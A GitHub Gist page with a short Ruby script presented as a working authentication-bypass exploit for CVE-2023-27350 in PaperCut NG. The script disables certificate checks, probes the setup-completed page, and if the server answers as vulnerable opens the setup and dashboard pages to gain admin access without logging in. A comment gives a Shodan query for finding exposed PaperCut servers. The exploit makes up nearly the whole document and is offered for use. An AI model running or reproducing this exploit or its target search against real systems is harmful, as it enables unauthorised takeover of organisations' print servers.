Created
May 10, 2023 19:23
-
-
Save komodoooo/43f034a62486bf8051b5075ebf5eac32 to your computer and use it in GitHub Desktop.
CVE-2023-27350 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'http' | |
| require 'openssl' | |
| puts """ | |
| CVE-2023-27350 | |
| PaperCut NG 22.0.5 Build 63914 auth bypass exploit | |
| By komodo\n | |
| """ | |
| =begin | |
| Shodan dork to search vulnerable targets: | |
| http.title:"PaperCut Login" http.html:"papercut" http.html:"print" | |
| http.favicon.hash:-626462482 | |
| =end | |
| def main(url) | |
| url.delete_suffix!("/") unless url[-1..-1] != "/" | |
| @ctx = OpenSSL::SSL::SSLContext.new() | |
| @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE | |
| pa=["/app?service=page/SetupCompleted", | |
| "/app?service=page/Dashboard"] | |
| if HTTP.get(url+pa[0], :ssl_context=>@ctx).status == 302 | |
| puts "\nNot vulnerable :(\n\n" | |
| else | |
| pa.each do |i| | |
| sus=url+i #yeah, "portability"... | |
| system("xdg-open %s || start %s || open %s"%[sus,sus,sus]) | |
| sleep(2) | |
| end | |
| end | |
| end | |
| begin | |
| print("Base URL: ") | |
| main(gets.chomp) | |
| rescue => err | |
| abort(err.to_s) | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment